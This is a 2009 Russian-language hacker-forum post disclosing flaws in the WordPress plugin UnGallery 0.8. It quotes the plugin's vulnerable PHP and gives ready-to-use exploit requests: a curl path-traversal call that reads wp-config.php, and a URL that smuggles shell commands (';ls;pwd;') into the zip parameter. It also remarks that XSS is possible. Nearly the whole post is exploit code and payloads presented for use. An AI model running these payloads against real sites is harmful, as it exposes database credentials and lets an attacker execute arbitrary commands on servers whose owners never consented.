16.06.2009, 12:17
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
UnGallery
Version: 0.8
Updated: 2009-6-11
Downloads: 226
Remote File Disclosure
PHP код:
if ($_GET['pic']) {
$filename = $_GET['pic'];
$len = filesize($filename);
$lastslash = strrpos($filename, "/");
$name = substr($filename, $lastslash + 1);
header("Content-type: image/jpeg;\r\n");
header("Content-Length: $len;\r\n");
header("Content-Transfer-Encoding: binary;\r\n");
header('Content-Disposition: inline; filename="'.$name.'"'); // Render the photo inline.
readfile($filename);
}
Код:
$ curl http://wordpress/wp-content/plugins/ungallery/source.php?pic=../../../wp-config.php
Shell Command Execution
PHP код:
$dir = "wp-content/plugins/ungallery/pics/" . $_GET['zip'];
// Create the arrays with the dir's image files
$dp = opendir($dir);
while ($filename = readdir($dp)) {
if (!is_dir($dir."/pics/".$gallery. "/". $filename)) { // If it's a file, begin
$pic_types = array("JPG", "jpg", "GIF", "gif", "PNG", "png");
if (in_array(substr($filename, -3), $pic_types)) $pic_array[] = $filename; // If it's a image, add it to pic array
}
}
foreach ($pic_array as $filename) {
$media_files = $media_files . " " . $dir . "/" . $filename;
}
$output = `zip -u -j $dir/pics.zip $media_files`;
print "<pre>$output</pre>";
print 'Complete. The file can be downloaded <a href="./wp-content/plugins/ungallery/source.php?zip=pics/' . $_GET['zip'] . '/pics.zip">here</a>';
print '<br><br>You can return to the gallery <a href="./gallery?gallerylink=' . $_GET['zip'] .'">here.</a>';
Код:
http://wordpress/wp-content/plugins/ungallery/zip.php?zip=non_existing_dir+non_existing_file;ls;pwd;
ps: Тут же можно провернуть XSS
__________________
включи голову
Последний раз редактировалось oRb; 16.06.2009 в 16:32..
|
|
|